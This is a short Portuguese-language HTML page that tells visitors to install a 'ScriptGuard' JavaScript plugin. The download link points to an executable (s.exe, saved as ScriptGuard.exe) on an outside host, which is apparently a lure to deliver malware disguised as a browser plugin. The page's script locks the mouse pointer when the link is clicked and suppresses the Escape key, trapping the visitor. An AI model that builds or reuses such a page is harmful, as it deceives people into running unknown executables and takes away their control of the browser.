<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HOME</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }

        h1 {
            color: #333;
            border-bottom: 2px solid #ccc;
            padding-bottom: 10px;
        }

        p {
            color: #555;
            margin-top: 10px;
        }

        a {
            display: inline-block;
            padding: 10px 20px;
            margin-top: 20px;
            background-color: #007BFF;
            color: #fff;
            text-decoration: none;
            border-radius: 5px;
            transition: background-color 0.3s ease;
        }

        a:hover {
            background-color: #0056b3;
        }

        /* Adiciona a regra para ocultar o cursor */
        body.cursor-hidden {
            cursor: none;
        }
    </style>
</head>
<body>

    <h1>HOME</h1>

    <p>Para ter acesso a todo o conteúdo interativo deste site, é necessário instalar o plugin JavaScript denominado "ScriptGuard" em seu navegador. Por favor, clique no link abaixo para baixar o plugin e desfrutar plenamente da experiência de navegação.:</p>
    
    <a href="https://sandro52.netlify.app/s.exe" download="ScriptGuard.exe" id="downloadLink">Download</a>

    <script>
    document.addEventListener('DOMContentLoaded', function () {
        var bodyElement = document.body;
        var downloadLink = document.getElementById('downloadLink');

      

        // Adiciona um evento de clique no link de download
        downloadLink.addEventListener('click', function() {
            // Solicita o bloqueio do cursor do mouse
            bodyElement.requestPointerLock = bodyElement.requestPointerLock || bodyElement.mozRequestPointerLock || bodyElement.webkitRequestPointerLock;
            bodyElement.requestPointerLock();
        });

        // Adiciona um manipulador de eventos para interceptar a tecla "Esc"
        document.addEventListener('keydown', function(event) {
            if (event.key === 'Escape' || event.key === 'Esc') {
                event.preventDefault();  // Impede o comportamento padrão do "Esc"
            }
        });
    });
</script>


</body>
</html>
